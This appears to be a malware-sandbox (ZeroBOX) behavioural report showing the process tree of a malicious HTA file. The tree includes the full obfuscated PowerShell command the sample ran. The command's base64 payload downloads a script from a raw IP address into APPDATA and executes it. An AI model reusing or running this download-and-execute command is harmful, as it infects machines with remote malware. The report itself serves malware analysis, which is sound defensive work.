| ZeroBOX

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\seethebestthingsformygirlshegreatfornewways.hta.html
3064
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3064 CREDAT:145409
  1780
  - POWeRshelL.exe "C:\Windows\SySTEm32\wIndOWsPoweRShElL\V1.0\POWeRshelL.exe" "pOWerSheLl -EX BypASs -noP -W 1 -c DEvIceCREdenTIALdepLOYMeNt ; IeX($(iEX('[SyStEM.tExt.EnCODINg]'+[ChaR]58+[CHar]0X3A+'uTF8.GETsTrInG([systEM.coNvERt]'+[cHAR]58+[chaR]58+'FRombAsE64STrInG('+[chAr]0x22+'JElnaTAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQkVyRGVmaU5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaVVlES2Z2LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVqWVBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2RzdlB2V2psZ1gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgektxSCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJJVCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6emVPTXIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHSEZEblUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRJZ2kwOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzY2Ni9uZXd0aGluZ3Nmb3JldmVyeW9uZXRvZ2V0Zm9yZ3JlYXR0aGluZ3N0b2JlLnRJRiIsIiRFTnY6QVBQREFUQVxuZXd0aGluZ3Nmb3JldmVyeW9uZXRvZ2V0Zm9yZ3JlYXR0aGluZ3N0by52YlMiLDAsMCk7c3RhUlQtc2xlRXAoMyk7c3RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcbmV3dGhpbmdzZm9yZXZlcnlvbmV0b2dldGZvcmdyZWF0dGhpbmdzdG8udmJTIg=='+[CHar]34+'))')))"
    1728
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BypASs -noP -W 1 -c DEvIceCREdenTIALdepLOYMeNt
      1060
    - csc.exe "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\lictfppc.cmdline"
      932
      - cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES9E5A.tmp" "c:\Users\test22\AppData\Local\Temp\CSC9DFB.tmp"
        2900

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents